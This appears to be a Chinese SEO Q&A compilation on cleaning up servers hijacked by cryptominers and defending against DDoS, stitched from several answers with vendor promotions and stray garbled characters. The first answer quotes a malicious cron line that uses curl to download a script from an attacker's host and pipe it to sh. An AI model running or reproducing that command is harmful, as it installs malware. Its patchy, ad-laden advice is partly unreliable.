阿里云服务器被挖矿成肉鸡_求助服务器被挖矿程序入侵如何排查

　　⑴ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

　　1. 关闭访问挖矿服务器的访问

　　iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

　　2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

　　3. pkill minerd ,杀掉进程

　　4. service stop crond 或者 crontab -r 删除所有的执行计划

　　5. 执行top，查看了一会，没有再发现minerd 进程了。

　　6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

　　下载脚本的语句：

　　*/5 * * * * curl -fsSL https://www.haveabitchin.com/pm.sh？0105010 | sh

　　病毒文件内容如下，感兴趣的可以研究下：

　　View Code

　　解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，https://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

　　1. 修复 redis 的后门,

　　配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

　　配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

　　配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

　　好消息是Redis作者表示将会开发“real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

　　2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

　　3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

　　⑵ 阿里云服务器是不是经常捉鬼放鬼

　　你这都是猜测，理由说不过去。我不知道你是多大的客户需要阿里云对你特殊对待，要知道阿里云安全产品的价格可是很高的啊，他确定你买得起吗？

　　阿里云支持按量付费服务器，被攻击的时候服务器并不会关闭，只是网络不通，但是“内网”是通畅的，临时开一台按量付费服务器做个端口转发就行了。从发现中断到重新上线通常不超过10分钟，如果你们有开发人员的话，接入阿里云的产品API，从被攻击下线到重新上线能控制在2-3分钟。我向来都是这么解决的，一年下来被攻击几十次，全年额外支出成本也不超过50块人民币，干嘛和阿里云较真，再说你毛的证据没有，顶多就来这里发发牢骚而已。

　　⑶ 阿里云服务器刚买两天就被攻击当肉鸡，黑客怎么做到的

　　应该是自己管理的问题 不善自己配置或管理的服务器 是极容易出现问题的 跟在哪里买的关系不大 先看你选择的是什么系统 或者是你自己购买服务器的账号泄露了？Web应用或组件存在漏洞导致提权被利用 还有很多其它方面的原因 而不是单纯的我在XX买的服务器 没两天就成肉鸡了 假如你开一堆没必要的端口和服务而且还是默认口令管你在那买的都没用 这叫服务器配置不当 据我所知云服务器商基本不会给你配置环境的都是你自己在弄 不要小看运维 让他安全稳定高效的跑起来绝对是一门学问 所以需要自己去琢磨了解学习。

　　⑷ 求助服务器被挖矿程序入侵，如何排查

　　新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

　　服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

　　会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

　　就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

　　户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

　　挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

　　仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

　　当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

　　对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

　　毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

　　客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

　　状况。

　　通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

　　发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

　　的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

　　SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

　　一切稳定运行，网站打开正常。

　　⑸ 阿里云服务器刚买两天就被攻击当肉鸡，黑客怎么做到的

　　您这服务器是被黑客入侵了，被黑的因素 一般都是程序留了后门或vps内被留了系统内核级别的木马 或网站的代码留了隐蔽性的木马或一句话shell

　　一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

　　服务器被黑是每个网站管理员最头痛的问题 也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.

　　⑹ 阿里云服务器被攻击怎么办

　　分布式拒绝服务攻击(DDOS)是目前常见的网络攻击方法，它的英文全称为Distributed Denial of Service？简单来说，很多DoS攻击源一起攻击某台服务器就形成了DDOS攻击，从而成倍地提高拒绝服务攻击的威力。

　　通常，攻击者将攻击程序通过代理程序安装在网络上的各个“肉鸡”上，代理程序收到指令时就发动攻击。

　　随着DDOS攻击的成本越来越低，很多人就通过DDOS来实现对某个网站或某篇文章的“下线”功能，某篇文章可能因为内容质量好，在搜索引擎有较高的排名，但如果因为DDOS导致网站长时间无法访问，搜索引擎则会将这篇文章从索引中删除，网站的权重也会降低，因为达到了“下线”文章的目的。

　　对付DDOS不太容易，首先要找一个靠谱的主机供应商，我之前有个主机供应商，一发现某个IP被DDOS，就主动屏蔽这个IP好几天，实际上就是硬件和技术能力不足的表现。

　　国外的主机供应商也未必靠谱，比如之前有次被DDOS，我就把博客转到Dreamhost的空间，事实表明Dreamhost的防DDOS的能力不敢恭维，DDOS来了之后，Dreamhost对付DDOS倒是不客气，直接把中国地区的IP全给屏蔽了。

　　一般来说，DDOS是需要花钱和带宽的，解决DDOS也需要花钱和带宽，那么，如果服务器被DDOS了，我们应该怎么办呢？

　　1、保证服务器系统的安全

　　首先要确保服务器软件没有任何漏洞，防止攻击者入侵。确保服务器采用最新系统，并打上安全补丁。在服务器上删除未使用的服务，关闭未使用的端口。对于服务器上运行的网站，确保其打了最新的补丁，没有安全漏洞。

　　2、隐藏服务器的真实IP地址

　　不要把域名直接解析到服务器的真实IP地址，不能让服务器真实IP泄漏，服务器前端加CDN中转(免费的CDN一般能防止5G左右的DDOS)，如果资金充裕的话，可以购买高防的盾机，用于隐藏服务器真实IP，域名解析使用CDN的IP，所有解析的子域名都使用CDN的IP地址。此外，服务器上部署的其他域名也不能使用真实IP解析，全部都使用CDN来解析。

　　总之，只要服务器的真实IP不泄露，5G以下小流量DDOS的预防花不了多少钱，免费的CDN就可以应付得了。如果攻击流量超过10G，那么免费的CDN可能就顶不住了，需要购买一些高防的收费CDN，一般高防CDN比较贵，比如阿里云腾讯云的10G防护一个月就78千一年，目前国内性价比比较高的推荐：网络云加速 ,10GDDOS防护套餐只需要1190一年，代理商买更便宜。相关链接

　　⑺ 阿里云被攻击多久解封云服务器被攻击了怎么解决

　　云服务器被ddos攻击最恶心了，尤其阿里云的服务器受攻击最频繁，因为黑客知道阿里云服务器的防御低，一旦被攻击就会进入黑洞清洗。轻则停服半小时，重则停2-24小时，给网站、 游戏 等带来很严重的损失。

　　最好处理ddos攻击的方法就是防止，不要等到被攻击了再来防御。这样成本就远超攻击前的防御。如果有把柄在黑客手中 ，就更加麻烦了，所以事前防御才是上上策 。想避免 DDOS 攻击 ，务必先搞清楚 ，灶困当今销售市场 99 %的DDOS攻击是对于 IP 以百G攻击流量导致网络服务器瘫患，以便做到攻击目的 ，因而 你务必防止服务器ip泄漏并掩藏 源ip ，那样黑客就无法找到源服务器ip ，也没法使用ddos有效地攻击你。

　　其实ddos的核心问题是成本低，而防御成本高。我所知道的今年国内应该出现了很多超200G的ddos攻击，而大部分公司都扛不住。今天飞飞就和你们分享一下解决方案。

　　对于低成本的防御方法，我给出几点建议：

　　1、挂cdn隐藏IP，在换成新的ip后，请务必挂cdn对真实的ip进行隐藏，这样无论怎样被攻击，cdn都可以为你进行抵御。

　　2、cdn不止可以套一层，可以多层一起嵌套，网络上免费的也不少。

　　准备多个服务器做反向代理（配置可以不高能运行nginx就行，最好是那种空路由时间短的），每个反向代理服务器都指向主服务器节点，都绑定一个二级域名，都挂上不同的cdn。

　　3、主域名可以随时解析到任意一个反向代理服务器，并且可以挂免费的云监控来实时监控服务器状态，一个节点死了改解析就行。

　　4、在防火墙层面禁止所有的国外ip（这是大部分肉鸡主要来源），可以很好地陪键降低攻击流量。

　　以上是比较简单、低成本的方法，如果资金充足的话，建议购买高防服务器和高防IP等防御产品，这样针对不同场景不同的环节也芦辩巧有针对性的防御方案，无法一概而论，当然也看您遇到的对手是什么样的级别。

　　因此，避免服务器遭受ddos攻击的最好是方式就是把高防CDN布置好，不能让对方了解你的源服务器ip ，即便高防cdn其中一个节点被打死 ，还可以立即切换到其他备用节点上。

　　携手驰网一同 探索 （拥有一台服务器可以做哪些很酷的事情？）

　　⑻ windows服务器被肉鸡了怎么办

　　一、立即执行

　　1、更改系统管理员账户的密码，密码长度不小于8位并且使用大写字母/小写字母/数字/特殊字符组合；

　　2、更改远程登录端口并开启防火墙限制允许登录的IP，防火墙配置只开放特定的服务端口并对FTP、数据库等这些不需要对所有用户开放的服务进行源IP访问控制；

　　3、检查是否开放了未授权的端口

　　windows在CMD命令行输入netstat /ano，检查端口；有开放端口的根据PID检查进程，删除对应路径文件（根据PID检查进程步骤：开始-->运行-->输入“msinfo32” 软件环境-->正在运行的任务 ）

　　linux 输入命令 netstat –anp查看

　　4、删除系统中未知账户，windows系喊袭统还需要检查注册表中的SAM键值是否有隐藏账户；

　　5、假如有WEB服务的，限制web运行账户对文件系统的访问权限，只开放仅读权限。

　　二、后期防御

　　重点操作：开启云盾所有功能，特别是网站安全防御 (自动防御所有WEB攻击)、网站后门检测（实时检测服务器上的后门程序）、主机密码破解防御

　　操作步骤：登录【云盾控制台】 --【服务设置】 进行开启

　　处理步骤：(重置系统 -- 手工修改各个密码 -- 开启云盾所有服务 )

　　1、手工修改密码

　　密码长度不小于8位并且使用大写字母、小写字母、数字、特殊字符组合

　　至少包括：

　　a.服务器登陆密码

　　b.数据库连接密码

　　c.网站后台密码

　　d.FTP密码

　　e.其他服务器管理软件密码

　　2、系统加固

　　a.到云盾控制裂扮台开启云盾所有服务，尤其是云盾网站安全防御（可以抵御黑客利用网站应用程序的漏洞入侵服务器，并且有专肆渗灶业的安全团队时刻关注国内安全动态，一旦发现新的漏洞出现，会立刻更新防护规则，防止黑客利用新漏洞入侵网站）

　　b.建议站长把网站后台隐藏起来，尽量在保证网站正常运行的前提下，把网站后台目录名改的长长的。（比如：//）

　　c. windows系统要及时更新系统补丁

　　⑼ 我的linux服务器成肉鸡了，向同一ip地址发送大量的udp包，把我的服务器资源都消耗光了，怎么解决，

　　1连上服务器 找出发包进程kill掉（这一步做不到可以无视）

　　2数据备份（有重要数据的话）

　　3重做系统

　　4还原数据

　　5做好安全防护（iptables禁用不用的端口，不需要的服务关闭，升级bash最近有漏洞）

　　⑽ 阿里云windows服务器中了挖矿的病毒怎么清理

　　光删除没用的，因为没有解决好漏洞。

　　建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。